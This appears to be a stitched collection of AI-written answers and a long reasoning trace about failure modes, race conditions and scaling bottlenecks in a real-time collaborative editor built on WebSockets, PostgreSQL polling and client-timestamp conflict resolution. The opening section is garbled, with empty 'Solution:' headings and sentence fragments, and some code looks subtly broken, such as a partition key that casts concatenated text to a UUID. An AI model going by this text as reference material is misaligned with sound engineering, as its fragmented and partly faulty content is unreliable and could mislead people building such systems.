Solution: Use server-generated monotonic timestamps (logical clocks or hybrid logical clocks) or adopt Operational Transformation (OT) / Conflict-Free Replicated Data Types (CRDTs).
Solution:
Solution: Store delta-based changes with periodic snapshots (e.g., every 100 changes or 5 minutes). Use event sourcing: store all operations, reconstruct document from log.
Solution: Only cache static assets in CDN. For API, use Redis cache with fine-grained invalidation (per document ID). Alternatively, use short-lived CDN TTL (e.g., 5 seconds) and soft purge on update.
Solution: Store JWT in httpOnly cookies (secure, sameSite strict) and implement sliding session renewal via refresh tokens (stored server-side in Redis). Use CSRF tokens for state-changing operations.
Solution: Use load balancer with sticky sessions (e.g., hash based on user ID or session ID) for WebSocket connections. For health checks, ensure WebSocket endpoints are monitored.
O(n)). This can overwhelm the database with redundant queries.Solution: Replace polling with database triggers + notification system (e.g., PostgreSQL LISTEN/NOTIFY) or use change data capture to push changes to a message queue that servers subscribe to.
LISTEN/NOTIFY has limited message payload size and no persistence.Solution: Implement read-after-write consistency by:
Solution:
Solution: Implement client-side queue with versioning and server-assigned document version numbers. On reconnect, replay queued operations if the base version still matches; otherwise, require merge/resolve.
Solution: Integrate APM tools (e.g., Datadog, New Relic) for Node.js servers, track WebSocket connections per server, message latency, and end-to-end sync delay. Use structured logging for operations.
Each solution involves a trade-off between complexity, performance, and user experience, but addressing these issues will significantly improve system reliability and scalability.
Issue: Each server only broadcasts to its own WebSocket clients → users connected to different servers won't see real-time updates from each other.
Solution: Use Redis Pub/Sub for cross-server WebSocket broadcasting
// When server receives change:
redis.publish(`doc:${docId}`, changeEvent);
// All servers subscribe to channel:
redis.subscribe(`doc:${docId}`, (change) => broadcastToLocalClients(change));
Trade-off: Adds network hop latency (~1-2ms), requires Redis cluster for high availability
Issue: Last-write-wins using client timestamps is fundamentally broken
Solution: Use server-generated monotonic sequence numbers
-- PostgreSQL sequence per document:
CREATE SEQUENCE doc_123_version_seq;
-- Each change: nextval('doc_123_version_seq')
Trade-off: Requires database round-trip before broadcasting (~5-10ms added latency)
Issue: 2-second polling interval across all servers will overwhelm database at scale
Solution: Replace polling with PostgreSQL LISTEN/NOTIFY
-- Server listens for document changes:
LISTEN doc_changes_123;
-- On change:
NOTIFY doc_changes_123, '{"version": 456}';
Trade-off: PostgreSQL connection limit (~500-1000 connections), requires connection pooling strategy
Issue: Saving entire document every 30 seconds wastes storage/bandwidth
Solution: Operational Transform (OT) or Conflict-free Replicated Data Types (CRDTs)
// Store operations instead of full HTML:
{
"op": "insert",
"pos": 42,
"text": "new text",
"version": 123
}
Trade-off: Complex implementation, requires operation history cleanup strategy
Issue: localStorage vulnerable to XSS attacks
Solution: HttpOnly cookies + CSRF tokens
httpOnly; secure; sameSite=strict flags// Frontend includes CSRF token in headers
axios.defaults.headers.common['X-CSRF-Token'] = getCSRFToken();
Trade-off: More complex auth flow, requires sticky sessions or JWT in cookies
Issue: Caching API responses for 5 minutes breaks real-time collaboration
Solution:
Cache-Control: no-storeIf-None-Match: "version123"Issue: Server crash loses all WebSocket connections
Solution:
// Client-side reconnection:
function reconnect() {
const delay = Math.min(1000 * 2 ** attempts, 30000);
setTimeout(connectWebSocket, delay);
}
Trade-off: Sticky sessions reduce load distribution effectiveness
Issue: Partitioning only by organization ID leads to hotspots
Solution: Composite partitioning key
-- Partition by (organization_id, document_id_hash)
PARTITION BY HASH((organization_id::text || document_id::text)::uuid)
Trade-off: More complex queries for cross-organization operations (admin views)
Issue: Last-write-wins loses intermediate changes
Solution: Implement Operational Transform (OT) with central server sequencing
// Server as single sequencer:
class OTServer {
applyOperation(doc, operation) {
const transformed = OT.transform(operation, this.pendingOps);
this.history.push(transformed);
return transformed;
}
}
Trade-off: Significant implementation complexity, requires undo/redo handling
Issue: Single points of failure in each component
Solution: Multi-AZ deployment with failover
Component Redundancy Strategy
------------- --------------------
PostgreSQL Multi-AZ RDS with read replicas
Redis Redis Cluster (6 nodes, 3 master/3 slave)
WebSocket Redis Pub/Sub + auto-scaling group
Load Balancer Multi-AZ ALB/NLB
Trade-off: 2-3x higher infrastructure cost
Issue: No visibility into system health
Solution: Implement observability stack
# SLO example:
availability: 99.95% over 30 days
latency: p95 < 200ms for document operations
Trade-off: Operational overhead, but essential for production
Immediate Fixes (Week 1):
Short-term (Month 1):
Long-term (Quarter 1):
This architecture can support ~10,000 concurrent editors with these changes, scaling to ~100,000 with additional Redis clustering and database optimization.
We need to analyze the given architecture for a real-time collaborative document editor, similar to Google Docs. The description includes components, data flow, sync strategy, and scaling plan. We are asked to identify potential failure modes, race conditions, and scaling bottlenecks. For each issue, propose a specific solution with trade-offs.
We need to be thorough: consider each component and interaction. The architecture seems to have several potential issues: WebSocket connections per server, broadcast only to clients connected to that server, other servers polling PostgreSQL every 2 seconds, conflict resolution using client timestamps, JWT in localStorage, snapshot storage, etc.
Let's break it down:
Components:
Data Flow:
Scaling Plan:
Now, we need to identify issues:
Potential Failure Modes: These are scenarios where the system may fail to operate correctly, such as data loss, inconsistency, unavailability, security issues, etc.
Race Conditions: Situations where the outcome depends on the sequence or timing of events, leading to unexpected behavior.
Scaling Bottlenecks: Points where the system cannot scale efficiently as load increases.
We'll go through each aspect.
Data flow: When a user types, change is sent via WebSocket to the server they are connected to (say Server A). Server A writes to PostgreSQL and broadcasts to all clients connected to Server A. Other servers (B, C) poll PostgreSQL every 2 seconds for changes, and then presumably they broadcast to their own clients. So eventually all clients receive updates, regardless of which server they are connected to, because other servers will pick up changes from DB and broadcast to their clients. So server affinity is not required for correctness. However, there is a delay: up to 2 seconds for cross-server propagation. That might be acceptable for some collaborative editing but not ideal. Also, if a client disconnects and reconnects, it may get a different server, but that's okay.
Potential failure modes:
Single point of failure: Load balancer? Usually load balancers can be made highly available. But if it fails, no new connections can be established. But existing WebSocket connections might still be alive if they bypass the LB? Usually LB is in front, so if LB fails, all connections go down. So need HA.
WebSocket server failure: If a server crashes, all its WebSocket connections are lost. Clients need to reconnect. Their unsent changes? Possibly they were in flight. The server might have written some changes to DB before crashing, but changes not yet written could be lost. Also, the server's broadcast might not have reached all its clients. However, because other servers poll DB, they might eventually get the changes that were persisted. But if the server crashed before writing to DB, the change is lost. Need to ensure durability.
Load balancer not WebSocket-aware: Some LBs may not handle WebSocket upgrade properly. But we assume it does.
Race Conditions:
Let's think deeper.
The architecture uses last-write-wins with client timestamps. This is problematic because client clocks cannot be trusted; they may be out of sync, or malicious users could set their clock forward to always win. Also, network delays can cause ordering issues. This is a classic issue: using client timestamps for conflict resolution leads to inconsistencies and potential data loss. Need a better approach like Operational Transform (OT) or Conflict-free Replicated Data Types (CRDTs), or using a central server with logical timestamps (e.g., vector clocks, sequence numbers). The trade-off is increased complexity.
Also, the polling interval of 2 seconds introduces a delay in cross-server propagation. For real-time collaboration, 2 seconds might be noticeable. But it could be acceptable for some use cases, but ideally we'd want lower latency. The delay also increases the chance of conflicts because users on different servers may not see each other's changes for up to 2 seconds.
Race condition: Two users on different servers edit same paragraph at nearly same time. Both servers receive the changes, write to DB, and broadcast to their own clients. The writes to DB: if they are updating the same field (e.g., paragraph content) with a timestamp, the second write (based on DB commit time) will overwrite the first, regardless of timestamp. Then when the other server polls, it will see the second write (maybe) and broadcast to its clients. But the first server's clients already saw the first change locally, and now they might receive the second change via polling? Actually, the first server broadcasted the first change to its clients. Then later, when it polls DB, it might see the second change (if it's later) and broadcast to its clients, overwriting the first. But the order of application may cause flickering or lost edits. If conflict resolution is done at client side, similar issues.
Better to use a log of operations with server-assigned sequence numbers, and each client applies operations in order. That's the typical approach (OT/CRDT). The trade-off is complexity.
Polling PostgreSQL every 2 seconds for changes from all servers. As number of servers increases, each server polls, causing load on DB. If many servers (say 100), each polling every 2 seconds, that's 50 queries per second per server? Actually, 100 servers * 0.5 Hz = 50 queries per second. That's not huge, but each query may scan for recent changes. If the changes table is large, scanning could be expensive. They might use a "last_updated" timestamp or a sequence ID. Still, polling can be inefficient. Alternative: use a message queue or pub/sub (like Redis Pub/Sub) to broadcast changes between servers in real-time, eliminating polling delay and reducing DB load. Trade-off: adds another component, but improves latency and scalability.
Also, the polling interval of 2 seconds means that changes are not immediately propagated across servers, causing a lag. For a collaborative editor, sub-second latency is desirable.
When a server receives a change, it broadcasts to its own clients. That's fine. But for clients on other servers, they rely on polling. So if a server receives a change, it doesn't immediately notify other servers; they have to wait up to 2 seconds. This increases latency for cross-server updates. Also, if a server crashes after broadcasting to its clients but before writing to DB? Actually, step 2: Server writes change to PostgreSQL, then step 3: broadcasts. So the write to DB is before broadcast. So if the write is successful, the change is persisted, and then broadcasted. If the server crashes after broadcast but before DB commit? Actually, order is important: they write then broadcast. But if the write fails, presumably they wouldn't broadcast. So the DB is the source of truth. Then other servers will eventually poll and get the change. So the local broadcast is an optimization for low latency for clients on the same server. However, if the server fails after write but before broadcast, the local clients won't get the change, but they might get it later via polling when they reconnect to another server? Actually, if the server crashes, its clients lose connection. They will reconnect to another server, and that server will poll DB and send the latest state. So the change is not lost. But there is a period where the user who made the change might not see it confirmed if the server crashes before broadcasting back to the originating client? The client might have sent the change and expects an echo or confirmation. If the server crashes before sending the broadcast, the client might not receive acknowledgment. It might resend, causing duplication. So need idempotency.
Documents saved as full HTML snapshots every 30 seconds. This means that changes are written to PostgreSQL presumably as incremental updates, but every 30 seconds a snapshot is taken. The snapshots could be used for recovery or for loading documents quickly. However, if the system only stores snapshots and not a log of operations, it's hard to reconstruct the document at arbitrary points for collaboration. The description says "Sync Strategy: Last-write-wins with timestamps from client clocks." This suggests that the document is stored as a set of paragraphs with timestamps, and each change updates the paragraph. The snapshot might be the full HTML of the document. But if we only have snapshots every 30 seconds, we risk losing changes if a crash occurs between snapshots. However, the changes are also written to PostgreSQL (presumably as updates to the document). But if they are writing each change directly to the document record, then the document is always up-to-date in the DB (except for replication lag). The snapshot might be a backup or for versioning. But the description: "Storage: Documents saved as full HTML snapshots every 30 seconds." Could be that the primary storage is the snapshot, and changes are applied to the snapshot in memory? Actually, we need to interpret: It says "Storage: Documents saved as full HTML snapshots every 30 seconds." That might mean that the document is persisted only every 30 seconds, not after each change. But step 2 says "Server writes change to PostgreSQL". So maybe they write each change to a changes table, and periodically create a snapshot from the log. That is common: store operations, and periodically compact into a snapshot. But the description is ambiguous. We'll assume they store each change in PostgreSQL, and also periodically save snapshots for faster loading. That's fine.
Potential failure: If the server crashes before snapshot is taken, the change log might grow large, and recovery might be slow. But that's manageable.
JWT tokens with 24-hour expiry stored in localStorage. This is a security concern: localStorage is vulnerable to XSS attacks. If an attacker can inject JavaScript, they can steal the token. Better to use HttpOnly cookies for storing tokens, but then need to handle CSRF protection. Trade-off: localStorage is easier for SPAs but less secure. Using cookies with HttpOnly and Secure flags is more secure but requires CSRF tokens or SameSite attributes. Also, JWT expiry 24 hours is long; could be shortened and use refresh tokens.
Also, JWT tokens are stateless, but they are stored in Redis for session cache? It says "Redis for session cache." Possibly they store something else. But if they use JWT, they might not need session cache unless they invalidate tokens. JWT is self-contained; if they want to invalidate, they need a blacklist, which could be in Redis. That's okay.
Potential failure: If the token is stolen, an attacker can impersonate the user until expiry. Mitigation: use short-lived tokens and refresh tokens with rotation.
CDN caches API responses for 5 minutes. For a collaborative editor, many API responses are user-specific or document-specific and dynamic. Caching for 5 minutes could lead to stale data. For example, GET /document/{id} might be cached, but the document changes frequently. If the CDN caches it, users might see outdated content. They should avoid caching dynamic data or use cache invalidation. Possibly they only cache static assets, but they said "also caches API responses for 5 minutes." That's a potential issue. They might have misconfigured CDN. We'll flag it.
Scaling plan: Horizontal scaling by adding more API servers, database read replicas for read-heavy operations, document partitioning by organization ID.
Potential bottlenecks:
Write scalability: PostgreSQL single primary for writes. As number of writes increases (many users editing many documents), the primary may become a bottleneck. Partitioning by org ID helps, but still all writes go to the primary unless sharding is implemented. They mention partitioning, which could be table partitioning within the same PostgreSQL instance, which doesn't help with write scaling across machines. Actually, "document partitioning by organization ID" could mean sharding across different database instances or clusters. But they didn't specify if it's horizontal sharding. Typically, partitioning in PostgreSQL is logical within a single database, but can help with management and indexing. For scaling writes, you need to distribute writes across multiple database nodes (sharding). They might intend to use separate databases per organization, but that's not trivial.
Polling load: As number of servers grows, polling load increases linearly. Could be mitigated with a message bus.
WebSocket connections per server: Node.js can handle many WebSocket connections, but there is a limit per server (memory, file descriptors). Horizontal scaling helps.
Redis for session cache: Redis can be a bottleneck if heavily used. But it's in-memory and can be clustered.
Because each server broadcasts changes to its own clients and others poll, there is eventual consistency with up to 2 seconds delay. For collaborative editing, this may be acceptable but not ideal. Also, conflict resolution via client timestamps can lead to inconsistent final states if clocks are skewed. Need to consider stronger consistency models.
If a server becomes partitioned from the database, it cannot write changes, so it should reject edits or queue them? Currently, it would likely fail to write and maybe not broadcast. But the client might be left hanging. Need to handle gracefully.
As mentioned, if two servers concurrently update the same paragraph based on client timestamps, they might both read the current state, decide to update, and the later commit overwrites the earlier. Example: Server A reads paragraph with timestamp T1. Client sends change with timestamp T2 (T2 > T1). Server A updates the row, setting content and timestamp to T2. Server B, around the same time, reads the same paragraph before A's update (so sees T1). Client sends change with timestamp T3 (T3 > T1). If T3 < T2, then B's update will overwrite A's update with older timestamp, losing A's change. This is a classic lost update problem. To avoid, they need to use conditional update (compare-and-set) where they update only if the current timestamp is older than the incoming timestamp, or use a version number. But even with conditional update, if both updates have timestamps that are both newer than the read timestamp, whichever commits later will win, but the earlier might be lost. But if they both check the current timestamp before writing, they can avoid overwriting a newer change. However, with concurrent transactions, it's still possible that both see the same old timestamp and both succeed? Actually, suppose both transactions read row with timestamp T1. They both check that their incoming timestamp > T1, which is true. They both attempt to update the row. The first commit will set timestamp to its value (say T2). The second commit will then see that the current timestamp is now T2 (if it re-reads before update, but in a typical UPDATE ... WHERE current_timestamp < incoming_timestamp, the WHERE clause will check the current value at time of update. So the second update's WHERE clause will compare incoming T3 with the current timestamp (which after first commit is T2). If T3 > T2, it will succeed and overwrite; if T3 < T2, it will not update (0 rows affected). So that prevents overwriting with older timestamp. So conditional update can work. But they didn't specify that. They just say "writes change to PostgreSQL". So likely they are doing a simple update, leading to lost updates.
Thus, a race condition exists.
Client timestamps can be arbitrarily wrong. A malicious user could set their clock far ahead to always win conflicts. This is a security issue. Need to use server-generated timestamps or logical clocks.
If snapshots are taken every 30 seconds, and the system crashes right before a snapshot, the last snapshot might be old. But if changes are logged, recovery can replay logs. However, if they rely solely on snapshots and not a persistent log, they could lose data. The description says "Server writes change to PostgreSQL", so changes are persisted. Snapshots are just periodic dumps. So that's okay.
Round-robin is fine for initial assignment, but if the load balancer does not support WebSocket persistence, it may route subsequent HTTP requests to different servers, which might be okay if the application uses tokens and stateless servers. However, for WebSocket, the upgrade request is just an HTTP request, so the LB can route it to a server, and then the TCP connection stays with that server. That's typical. So not a problem.
Redis is used for session cache. If Redis fails, sessions might be lost, and users may need to re-authenticate. Could be mitigated with replication and failover. But it's a potential single point of failure.
As mentioned, caching dynamic data is problematic. Also, if the CDN caches API responses that are supposed to be real-time, it breaks the collaborative experience. They should not cache API responses for the document endpoints, or at least use cache-control: no-cache. They might be caching static assets only, but they said "also caches API responses for 5 minutes." That is likely a mistake.
When a server broadcasts to all its clients, if it has many clients (thousands), broadcasting a change to all could be heavy and block the event loop. Node.js can handle it with careful management (e.g., using ws library and iterating over clients). But as number of clients per server grows, broadcast latency increases. Could use a pub/sub system where each server subscribes to document channels and pushes to clients via WebSocket, offloading the broadcast logic? Actually, the current design: each server broadcasts only to its own clients, which is fine because it's only the clients connected to that server. The total broadcast load is distributed across servers. So that scales horizontally. However, if a document has many collaborators all on the same server (due to LB distribution), that server may have to broadcast to many clients. That's okay as long as the server can handle the load. Could be optimized by using a shared pub/sub (like Redis) to fan out messages to all servers, each then sends to its own clients. That would also reduce the need for polling.
Polling every 2 seconds is not real-time and adds load. Could use LISTEN/NOTIFY in PostgreSQL to get notifications of changes, eliminating polling. That would be more efficient and reduce latency. But NOTIFY has limitations in scalability (each connection can listen). However, with many servers, each connection can listen to channels. PostgreSQL's NOTIFY can handle many listeners, but there might be performance implications. Alternatively, use a message queue like RabbitMQ or Kafka.
Partitioning by organization ID helps distribute data. But if some organizations have huge numbers of documents and heavy editing, they may still be a hotspot. Need to consider further sharding.
If a server crashes, clients reconnect. But there might be in-memory state about pending changes. If the server was holding unsent broadcasts or buffered operations, they could be lost. But since changes are written to DB before broadcast, the persisted state is safe. However, the server might have acknowledged to the client before writing to DB? The flow says write then broadcast, but does the server send an ACK to the client? Not specified. Typically, the server might broadcast the change to all clients including the sender, and the sender sees its own change applied. But if the server crashes after writing to DB but before broadcasting, the originating client may not see its change reflected, and might think it failed. The client could resend, causing duplication. To handle, use idempotent operations with client-generated IDs, so resending doesn't cause duplicate changes.
WebSocket connections are persistent and may need to be authenticated. Typically, the connection starts with an HTTP request containing the JWT. The server validates the token and upgrades. If the token expires during the connection, the server should close the connection or request re-authentication. With 24-hour expiry, it's less likely but still possible. Need to handle token refresh via a separate API call, and possibly re-establish WebSocket.
Now, let's list the issues systematically.
We'll categorize:
Real-time Sync and Conflict Resolution
Database Polling
WebSocket and Load Balancing
Data Storage and Snapshots
Authentication and Security
Scalability Bottlenecks
Consistency and Fault Tolerance
We'll produce a list of specific issues with solutions and trade-offs.
Let's think of more nuanced issues:
Issue: Client clock skew leading to unfair conflict resolution. Solution: Use server-generated timestamps or logical clocks (e.g., vector clocks, sequence numbers). Trade-off: Increases server load and complexity.
Issue: Lost updates due to concurrent writes without conditional checks. Solution: Use optimistic concurrency control with version numbers (e.g., incrementing version per document or per paragraph). Trade-off: Requires reading before writing, and handling failed updates (retry). Could also use Operational Transform or CRDTs for collaborative editing, which are more robust but complex.
Issue: Polling for changes introduces up to 2 seconds latency for cross-server updates. Solution: Replace polling with a pub/sub system (e.g., Redis Pub/Sub, Kafka, or PostgreSQL NOTIFY) to push changes between servers in real-time. Trade-off: Adds complexity and new components, but reduces latency and DB load.
Issue: Database polling every 2 seconds by each server can cause high load on DB as number of servers grows. Solution: Use a message bus as above, or batch polling, or increase polling interval, but best is pub/sub. Trade-off: same.
Issue: Single point of failure at load balancer. Solution: Deploy multiple load balancers with DNS round-robin or anycast, or use cloud provider's managed LB with HA. Trade-off: Cost, complexity.
Issue: WebSocket server failure may cause clients to lose connection and unsent changes if not acknowledged. Solution: Implement client-side buffering and retry with idempotent operation IDs. On server side, ensure changes are persisted before acknowledging to client. Use heartbeats to detect failure quickly. Trade-off: Client code complexity, potential duplicate operations.
Issue: JWT stored in localStorage vulnerable to XSS. Solution: Store JWT in HttpOnly cookie with Secure and SameSite=Strict. Use CSRF tokens. Trade-off: More complex to implement, but more secure. Also, cookies are sent automatically, which could be a risk for CSRF; but SameSite and CSRF tokens mitigate.
Issue: CDN caching API responses for 5 minutes leads to stale data. Solution: Configure CDN to not cache dynamic API responses, or use appropriate Cache-Control headers (no-cache, private). Trade-off: Increased load on origin servers but ensures freshness.
Issue: Horizontal scaling of writes to PostgreSQL is limited. Solution: Shard the database by organization ID across multiple PostgreSQL instances or use a distributed database like CockroachDB. Trade-off: Increased operational complexity, potential cross-shard queries harder.
Issue: Redis as session cache single point of failure. Solution: Use Redis Cluster or sentinel for high availability. Trade-off: More complex setup.
Issue: Broadcast to many clients on same server may block event loop. Solution: Use non-blocking I/O, and consider using a dedicated WebSocket server library that handles broadcast efficiently (e.g., using ws and iterating). Could also offload to a pub/sub where each client subscribes to a channel and Redis pushes directly? Not directly; server still needs to send. But can use worker threads? Not needed. Node.js can handle many WebSocket connections; broadcasting to all clients of a document might be O(n) per change, which could be heavy if many clients. Could use a fanout mechanism: each client connection is independent, and Node.js can send messages asynchronously. It's manageable with moderate numbers. For large scale, consider using a dedicated real-time backend like Socket.IO with Redis adapter, which distributes broadcasts across servers via pub/sub. Actually, that's a good point: currently, each server only broadcasts to its own clients. If a document has collaborators spread across multiple servers, each server needs to broadcast to its own clients. That's fine. But if a server has many clients for a popular document, it might be a bottleneck. However, the load balancer should distribute clients evenly. If a particular document is very popular, its collaborators may still be on multiple servers? Actually, if many users are editing the same document, they could be connected to different servers. So the load is distributed. So broadcast per server is not a huge issue. But still, the server needs to send the same message to all its clients interested in that document. That's O(clients_per_server). That's okay.
Issue: Polling interval may cause merge conflicts to be more frequent because users don't see others' changes quickly. Solution: Reduce polling interval, but that increases DB load. Use pub/sub to push changes instantly.
Issue: Using full HTML snapshots every 30 seconds could be inefficient if documents are large and changes are small. Solution: Store incremental changes (operational transforms) and rebuild snapshots asynchronously. Trade-off: More complex but saves storage and I/O.
Issue: Round-robin load balancing may not account for server load, leading to uneven distribution. Solution: Use load-aware LB (e.g., least connections, CPU). Trade-off: More sophisticated LB.
Issue: No mention of monitoring, logging, or alerting. But not asked.
Now, we need to produce a comprehensive answer listing each potential failure mode, race condition, and scaling bottleneck, with specific solutions and trade-offs.
We should structure the answer clearly. Possibly group related issues.
Let's outline:
Real-time Sync Issues
Database Polling Scalability
WebSocket and Load Balancer Failure Modes
Authentication and Security
Data Storage and Snapshots
Scalability Bottlenecks
Consistency and Partition Tolerance
Other Race Conditions
Problem: Polling with a time window may miss changes if they are made exactly at the boundary, or may fetch duplicates. Solution: Store changes with an auto-increment ID, and each server tracks last processed ID. Trade-off: Requires additional bookkeeping.
Now, we need to produce a final answer that lists these issues and solutions.
The instruction: "Identify all potential failure modes, race conditions, and scaling bottlenecks in this architecture. For each issue found, propose a specific solution with trade-offs."
We should produce a list, perhaps bullet points or numbered, each with a clear description, problem, solution, trade-off.
We can group but ensure each issue is distinct.
Let's compile a comprehensive list:
Potential Failure Modes (system may fail or behave incorrectly):
Client clock skew causing unfair conflict resolution: Clocks may be out of sync; malicious users can set clock ahead to always win. Solution: Use server-assigned timestamps or sequence numbers. Trade-off: Adds latency (need to get timestamp from server) and requires coordination; but ensures fairness and consistency.
Lost updates due to concurrent writes without concurrency control: Two servers may overwrite each other's changes. Solution: Use optimistic concurrency control with version numbers (e.g., increment version on each update, check before write). Trade-off: Requires reading before writing, handling retries, may increase DB load.
WebSocket server failure leading to lost in-flight changes: If server crashes after receiving change but before persisting or acknowledging, client may think change failed or resend. Solution: Implement idempotent operation IDs, persist change before acknowledgment, and client retries with same ID. Trade-off: Client-side complexity, need to generate unique IDs.
Load balancer single point of failure: If load balancer fails, service becomes unavailable. Solution: Use highly available load balancer setup (active-passive with failover) or cloud-managed LB with redundancy. Trade-off: Additional cost and complexity.
Redis session cache failure: If Redis goes down, session data lost, users may be logged out. Solution: Use Redis Cluster with replication and automatic failover. Trade-off: Increased operational overhead.
Database primary failure: PostgreSQL primary failure can cause downtime. Solution: Set up streaming replication with failover (e.g., using Patroni). Trade-off: Complexity and potential data loss during failover.
Network partition between server and DB: Server cannot write, edits fail. Solution: Allow offline editing with local queue and sync later using CRDTs. Trade-off: Significant complexity, but improves availability.
CDN caching dynamic API responses: Users may see stale document content. Solution: Configure CDN to not cache API responses, or set proper Cache-Control headers. Trade-off: Increased load on origin servers.
JWT stored in localStorage vulnerable to XSS: Attackers can steal tokens. Solution: Store tokens in HttpOnly cookies with Secure and SameSite flags, and implement CSRF protection. Trade-off: More complex to implement, but more secure.
Long JWT expiry increases risk if token stolen: 24 hours is long. Solution: Use short-lived access tokens (e.g., 15 min) with refresh tokens stored securely. Trade-off: More frequent token refresh, need refresh endpoint.
Race Conditions (timing issues leading to inconsistency):
Concurrent updates to same paragraph without proper locking: Two servers read old state, both update, leading to lost update. (Already covered in lost updates, but it's a race condition). Solution: Conditional updates (compare-and-set) as above.
Polling window overlap causing duplicate processing of changes: If servers poll for changes based on timestamp, they may fetch the same change twice, leading to duplicate broadcasts. Solution: Use a monotonically increasing sequence ID for changes, and each server tracks last processed ID. Trade-off: Requires additional bookkeeping per server.
Client reconnection after server crash may cause duplicate operations: If client resends change after timeout, but original change was persisted, duplicate may be applied. Solution: Idempotent operation IDs as above.
Timestamp-based conflict resolution with network delays: Even with conditional updates, if two clients have timestamps that are both newer than current, the later commit may overwrite the earlier if timestamps are close and one server's write is delayed. Actually, conditional update with timestamp check would prevent overwriting if the incoming timestamp is not greater than current. But if both have timestamps greater than current, the first will succeed, the second will check if its timestamp > current (now updated to first's timestamp). If second's timestamp > first's, it will overwrite; if not, it will fail. So order depends on timestamp order, not commit order. That's fine. But if clocks are skewed, a later edit may have an earlier timestamp and be rejected incorrectly. That's a failure mode, not race. So the race is mitigated by conditional update, but clock skew remains.
Scaling Bottlenecks (limits to growth):
Database write scalability: Single PostgreSQL primary handles all writes. As number of concurrent edits grows, writes may become bottleneck. Solution: Shard database by organization ID across multiple PostgreSQL instances or use distributed SQL. Trade-off: Application must route queries to correct shard; cross-organization queries become complex.
Polling load on database: Each server polling every 2 seconds causes read load that scales with number of servers. Solution: Replace polling with pub/sub (e.g., Redis Pub/Sub, Kafka) to push changes. Trade-off: Introduces new component, but reduces DB load and latency.
WebSocket connections per server: Node.js may hit limits (e.g., ~65k connections per server due to port range, but actually limited by file descriptors). Solution: Scale horizontally, tune OS limits, use a more scalable WebSocket server (e.g., using Go or Erlang). Trade-off: Adding servers is straightforward; may need to adjust architecture.
Broadcast to many clients on a single server: If a popular document has many collaborators on the same server, broadcasting a change to all could be CPU-intensive and cause backpressure. Solution: Use a dedicated pub/sub where each client connection is handled by the server, but broadcast can be optimized by using a set of WebSocket connections and iterating; or use Redis Pub/Sub to fan out messages to multiple servers even for same document, but that's already for cross-server. For intra-server, it's still O(N). Could use multicast? Not over internet. Trade-off: Acceptable for moderate N; if N is huge, may need to partition further.
Redis as central cache: As number of users grows, Redis may become a bottleneck. Solution: Use Redis Cluster to distribute load. Trade-off: More complex configuration.
Snapshot generation overhead: Generating full HTML snapshots every 30 seconds for many documents could consume CPU and I/O. Solution: Generate snapshots asynchronously in background workers, and only for active documents. Trade-off: Delayed snapshots, but reduces peak load.
Load balancer round-robin not load-aware: May cause uneven load across servers. Solution: Use load balancer with least connections or based on server health. Trade-off: May require more sophisticated LB features.
Now, we need to present these in a clear, concise manner. The instruction says "Identify all potential failure modes, race conditions, and scaling bottlenecks." So we should list them, perhaps categorized, but ensure each is identified and then a solution with trade-offs.
We should be careful not to over-list; some are duplicates. For example, "lost updates" is both a failure mode and race condition. We can present as one item with both aspects.
Let's produce a structured answer:
We can number them.
Given the breadth, we can combine related issues where appropriate, but the instruction says "for each issue found", so each distinct issue should have its own solution.
I'll produce a list of about 10-15 items, covering the main points.
But let's also consider if there are any issues with the "partitioning by organization ID" scaling plan. It might be insufficient if an organization is very large. That's a scaling bottleneck: hotspot organizations. Solution: further shard within organization by document ID or user. Trade-off: complexity.
Also, the system uses "last-write-wins" which is a simplistic conflict resolution; for collaborative editing, it can lead to poor user experience because typing over each other's changes may be lost. That's a functional issue, not just technical. But we can mention that a more sophisticated approach like OT/CRDT is preferable, but with trade-offs of complexity.
Now, let's draft.
Answer Outline:
Conflict Resolution Using Client Timestamps
Lost Updates Due to Lack of Concurrency Control
Polling Delay and DB Load
WebSocket Server Failure and In-Flight Changes
Load Balancer Single Point of Failure
Redis Session Cache Availability
Database Write Scalability
JWT Stored in localStorage (XSS Risk)
Long JWT Expiry
CDN Caching API Responses
Snapshot Generation Overhead
Polling Duplicate Processing
Load Balancer Not Load-Aware
WebSocket Connection Limits
Offline Support and Network Partitions
We might also mention the issue of "Broadcast to many clients on same server" but it's somewhat covered by scaling horizontally and load balancing. Could be added.
But the list is already long. We need to ensure we cover the main points from the description.
Now, we need to write the final answer in a clear, organized way.
I'll structure as:
Potential Failure Modes, Race Conditions, and Scaling Bottlenecks
But to keep it concise, we can just present each as a paragraph with bullet.
Given the instruction, we can just list each issue and its solution with trade-offs.
I'll produce a numbered list.
Let's start writing.
But before final, double-check the architecture: "Real-time: Each API server maintains its own WebSocket connections to clients" and "Sync Strategy: Last-write-wins with timestamps from client clocks". That is a major red flag. Also "Other servers poll PostgreSQL every 2 seconds for changes". So indeed polling is used.
Now, also note: "Database: PostgreSQL for document storage, Redis for session cache". So Redis is only for session cache, not for real-time. So they might be using Redis for caching sessions, not for pub/sub. So we can propose using Redis Pub/Sub to replace polling, which would also leverage existing Redis, but then we need to ensure Redis is highly available. That's a trade-off: using Redis for both cache and pub/sub might overload it; but can scale.
Also, "Storage: Documents saved as full HTML snapshots every 30 seconds." Could be that they are only saving snapshots, not each change. But step 2 says "Server writes change to PostgreSQL". So maybe they write changes to a table, and then a periodic job creates snapshots. That's plausible. So we should not assume they only have snapshots. But we can still mention that snapshot-only would be problematic; but given they write changes, it's okay. However, they might be writing the change as an update to the document record directly, which would mean the document is always up-to-date, and snapshots are backups. That's fine.
Potential issue: If they update the document record directly on every keystroke, that could be a huge number of writes. Usually collaborative editors buffer changes and send batches. But they didn't specify. That could be a scaling issue: high write rate. But we can mention that sending every keystroke as a DB write might overload DB; batching could help.
But the description says "User types → change event sent via WebSocket". That could be per keystroke, which is a lot. They might want to throttle or batch. But not explicitly a problem? We can add as a scaling bottleneck: high frequency of DB writes. Solution: buffer changes and write in batches, or use a log-based approach with asynchronous compaction. Trade-off: potential data loss if server crashes before flush.
But we already have many items; maybe include.
Let's see: "User types → change event sent via WebSocket to their connected server". That implies each keystroke is sent immediately. That's typical for real-time collaboration. But then "Server writes change to PostgreSQL". Writing each keystroke to PostgreSQL could be heavy. Many systems use an operation log (like a changes table) which is append-only, which is efficient. But still, high volume of writes. They could use a message queue to decouple, or batch. But we can mention.
Also, conflict resolution: if they write each keystroke as an update to the same row (paragraph), that's even worse. Usually collaborative editors use operational transforms where each operation is stored and applied in order. That's more scalable. So the architecture seems naive.
Given the scope, we should highlight that the entire sync strategy is flawed and not suitable for real-time collaborative editing. But the question asks to identify potential failure modes, race conditions, and scaling bottlenecks, and propose solutions with trade-offs. So we can point out that last-write-wins is inappropriate and suggest OT/CRDT.
